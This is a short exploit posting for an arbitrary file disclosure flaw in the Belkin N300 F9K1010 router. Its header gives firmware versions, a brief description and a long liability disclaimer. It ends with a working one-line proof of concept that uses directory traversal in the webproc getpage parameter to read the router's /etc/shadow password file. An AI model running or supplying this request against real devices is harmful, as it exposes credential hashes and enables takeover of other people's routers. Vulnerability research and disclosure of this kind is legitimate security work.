Belkin N300 WiFi N Router F9K1010 Arbitrary File Disclosure

1. #  Belkin  N300  WiFi N  Router  F9K1010
2. #  Arbitrary  File  Disclosure
3. #
4. #  Copyright 2015 (c) Todor Donev
5. #  [email protected]
6. #  http://www.ethical-hacker.org/
7. #  https://www.facebook.com/ethicalhackerorg
8. #  http://pastebin.com/u/hackerscommunity
9. #
10. #  Version Info:
11. #  Firmware Version    F9K1010_WW_1.00.06
12. #  Hardware            F9K1010 v1
13. #  Boot Version        v1.0.0
14. #
15. #  Description:
16. #  This vulnerability in the Belkin routers could
17. #  allow  an  attacker  to  read  the contents of
18. #  arbitrary  files. The vulnerability  is due to
19. #  incomplete input validation. An attacker could
20. #  exploit this  vulnerability  by issuing a full
21. #  path to files.
22. #
23. #  Disclaimer:
24. #  This  or  previous program  is  for Educational
25. #  purpose ONLY. Do not use it without permission.
26. #  The  usual  disclaimer  applies, especially the
27. #  fact  that  Todor Donev  is  not liable for any
28. #  damages caused by direct or indirect use of the
29. #  information or functionality  provided by these
30. #  programs.  The author or any  Internet provider
31. #  bears  NO  responsibility for content or misuse
32. #  of these programs or  any  derivatives thereof.
33. #  By  using  these  programs  you accept the fact
34. #  that any damage (dataloss, system crash, system
35. #  compromise,  etc.)  caused  by the use of these
36. #  programs is not  Todor Donev's  responsibility.
37. #
38. #  Use  at  your  own risk and educational purpose
39. #  ONLY!
40. #
41. [todor@adamantium ~]$ GET "http://TARGET/cgi-bin/webproc?getpage=../../../../../../../../../../etc/shadow"